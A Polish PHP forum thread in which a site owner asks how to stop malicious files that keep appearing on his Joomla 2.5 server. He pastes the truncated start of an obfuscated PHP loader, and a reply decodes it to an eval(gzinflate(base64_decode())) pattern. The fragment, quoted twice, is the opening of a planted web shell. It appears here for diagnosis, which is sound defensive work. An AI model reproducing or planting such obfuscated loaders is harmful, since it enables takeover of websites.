Witaj Gościu! ( Zaloguj | Rejestruj )

Forum PHP.pl

> [PHP]Problem z wirusem lub Joomla
damianoo
post
Post #1





Grupa: Zarejestrowani
Postów: 7
Pomógł: 0
Dołączył: 28.09.2015

Ostrzeżenie: (0%)
-----


Witam, ostatnimi czasy mam taki problem. Na moim serwerze gdzie mam strony internetowe na Joomla 2.5 mam poważny problem, samoistnie wgrywają się jakieś pliki, typu dump.php, wp-error.php lub license.php itp. Dostałem od superhostu listę plików zainfekowanych w których były różnego rodzaju zapiski w jakimś dziwnym języku programowania. Niestety problem nadal jest, lecz już nie taki jak był na początku. Jak mogę zabezpieczyć serwer lub strony przed tego typu atakiem? Dodam, że zmieniłem wszystkie hasła itd.

Proszę o pomoc.

Część zawartości jednego z plików, w tym wypadku wp-error.php

  1. <?php $KE393 = "lr)/m_2x9ac.j;687dkev5nigothsq1u*b(4y3zfw0p";$ZjF4018 = $KE393[42].$KE393[1].$KE393[19].$KE393[24].$KE393[5].$KE393[1].$KE393[19].$KE393[42].$KE393[0].$KE393[9].$KE393[10].$KE393[19];$c1985 = "eva".chr(108)."\x28".chr(103)."\x7a".chr(105)."\x6E".chr(102)."\x6C\x61\x74\x65\x28\x62".chr(97)."s\x65".chr(54)."\x34".chr(95)."dec\x6fd\x65".chr(40)."";$hMpvX6091 = ")".chr(41)."\x29".chr(59)."";$xY4419 =
Go to the top of the page
+Quote Post
 
Start new topic
Odpowiedzi
KsaR
post
Post #2





Grupa: Zarejestrowani
Postów: 520
Pomógł: 102
Dołączył: 15.07.2014
Skąd: NULL

Ostrzeżenie: (0%)
-----


Cytat(damianoo @ 28.09.2015, 20:27:44 ) *
Witam, ostatnimi czasy mam taki problem. Na moim serwerze gdzie mam strony internetowe na Joomla 2.5 mam poważny problem, samoistnie wgrywają się jakieś pliki, typu dump.php, wp-error.php lub license.php itp. Dostałem od superhostu listę plików zainfekowanych w których były różnego rodzaju zapiski w jakimś dziwnym języku programowania. Niestety problem nadal jest, lecz już nie taki jak był na początku. Jak mogę zabezpieczyć serwer lub strony przed tego typu atakiem? Dodam, że zmieniłem wszystkie hasła itd.

Proszę o pomoc.

Część zawartości jednego z plików, w tym wypadku wp-error.php

  1. <?php $KE393 = "lr)/m_2x9ac.j;687dkev5nigothsq1u*b(4y3zfw0p";$ZjF4018 = $KE393[42].$KE393[1].$KE393[19].$KE393[24].$KE393[5].$KE393[1].$KE393[19].$KE393[42].$KE393[0].$KE393[9].$KE393[10].$KE393[19];$c1985 = "eva".chr(108)."\x28".chr(103)."\x7a".chr(105)."\x6E".chr(102)."\x6C\x61\x74\x65\x28\x62".chr(97)."s\x65".chr(54)."\x34".chr(95)."dec\x6fd\x65".chr(40)."";$hMpvX6091 = ")".chr(41)."\x29".chr(59)."";$xY4419 =

Po zdekodowaniu zmiennych:
Cytat
preg_replaceeval(gzinflate(base64_decode()));

  1. echo htmlspecialchars($ZjF4018, ENT_QUOTES, 'UTF-8');
  2. echo htmlspecialchars($c1985, ENT_QUOTES, 'UTF-8');
  3. echo htmlspecialchars($hMpvX6091, ENT_QUOTES, 'UTF-8');

Wylacz register_globals jeżeli jest wlaczone.
Dokladniejszej analizy nie mam jak zrobic bo za mało kodu itp, a na Joomli sie nie znam (IMG:style_emoticons/default/tongue.gif) P
Ale zakładam że ten plik jest gdzieś includowany? Bo inaczej bez sensu by był.

Ale, byl podobny przypadek juz (IMG:style_emoticons/default/tongue.gif) :
http://forum.php.pl/index.php?showtopic=24...p;#entry1160065

Czyli tak jak widac twoj wirus chyba nie pelny
( $xY4419 = )
Na tym sie konczy?

Ten post edytował KsaR 28.09.2015, 22:30:26
Go to the top of the page
+Quote Post

Posty w temacie


Reply to this topicStart new topic
2 Użytkowników czyta ten temat (2 Gości i 0 Anonimowych użytkowników)
0 Zarejestrowanych:

 



RSS Aktualny czas: 13.10.2025 - 13:39